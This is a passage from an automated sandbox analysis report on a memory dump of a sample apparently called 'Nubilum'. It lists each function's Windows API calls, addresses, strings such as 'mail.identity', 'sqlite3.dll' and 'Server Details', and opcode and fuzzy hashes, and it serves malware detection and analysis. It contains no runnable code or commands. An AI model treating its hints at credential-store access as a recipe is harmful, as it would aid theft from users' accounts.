                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: @
                          • API String ID: 3510742995-2766056989
                          • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                          • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                          • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                          • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _strcmpi
                          • String ID: C@$mail.identity
                          • API String ID: 1439213657-721921413
                          • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                          • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                          • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                          • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _ultoasprintf
                          • String ID: %s %s %s
                          • API String ID: 432394123-3850900253
                          • Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                          • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                          • Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                          • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                          APIs
                          • LoadMenuA.USER32(00000000), ref: 00409078
                          • sprintf.MSVCRT ref: 0040909B
                            • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                            • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                            • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                            • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                            • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                            • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                            • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                          • String ID: menu_%d
                          • API String ID: 1129539653-2417748251
                          • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                          • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                          • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                          • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                          APIs
                          • _mbscpy.MSVCRT ref: 004070EB
                            • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                            • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                          • _mbscat.MSVCRT ref: 004070FA
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: _mbscat$_mbscpystrlen
                          • String ID: sqlite3.dll
                          • API String ID: 1983510840-1155512374
                          • Opcode ID: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                          • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                          • Opcode Fuzzy Hash: 703b69e07acbe077e06bd20ed0989211d3b3f883f36283526058d65f6b3f8447
                          • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                          APIs
                          • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                          • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: LongWindow
                          • String ID: MZ@
                          • API String ID: 1378638983-2978689999
                          • Opcode ID: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                          • Instruction ID: af96c772fb3515a1af29397562e0ba089e4702b068c0c421cdc779d54beb7f6e
                          • Opcode Fuzzy Hash: 8462b9c2cb3aef36d21d1686e73b86856dc2d3eef16ca418d57205f56e0b0ffb
                          • Instruction Fuzzy Hash: 81C0123015D0166BCF101B24DC04E167E54B782321F208770B062E00F0C7704400A504
                          APIs
                          • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                          Strings
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: PrivateProfileString
                          • String ID: A4@$Server Details
                          • API String ID: 1096422788-4071850762
                          • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                          • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                          • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                          • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                          APIs
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: FreeLocalmemcpymemsetstrlen
                          • String ID:
                          • API String ID: 3110682361-0
                          • Opcode ID: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                          • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                          • Opcode Fuzzy Hash: 897615c881cd852db71c2974e4c1980885af2901914c85ec6a63c0d2c90f3a68
                          • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                          APIs
                          Memory Dump Source
                          • Source File: 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001D.00000002.1689288450.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                          • Associated: 0000001D.00000002.1689288450.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_29_2_400000_Nubilum.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID:
                          • API String ID: 3510742995-0
                          • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                          • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                          • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                          • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8